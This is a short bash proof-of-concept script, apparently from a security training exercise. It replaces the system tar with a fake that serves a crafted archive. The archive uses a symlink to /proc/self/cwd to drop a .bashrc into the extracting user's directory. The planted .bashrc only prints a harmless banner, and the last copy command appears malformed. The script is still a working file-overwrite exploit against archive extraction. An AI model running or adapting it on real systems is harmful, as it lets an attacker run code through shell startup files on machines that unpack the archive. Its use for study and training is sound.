#!/bin/bash

cat<<EOF > tarbad
#!/bin/bash

cat ~/evil/pwn.tar
EOF
mkdir badbash
cd badbash
ln -s /proc/self/cwd k8s-master
cd k8s-master
cat<<EOF > .bashrc
echo " _____________________"
echo "< Hello K-Shield Jr. 2>"
echo " --------------------- "
echo "   \"
echo "    \"
echo "     \ "
echo "                    ##        ."
echo "              ## ## ##       =="
echo "           ## ## ## ##      ==="
echo "       /""""""""""""""""___/ ==="        
echo "  ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~"   
echo "       \______ o          __/"            
echo "        \    \        __/ "            
echo "          \____\______/   "
EOF
cd ~/evil
tar -cvf pwn.tar badbash/
cp tarbad/bin/tar

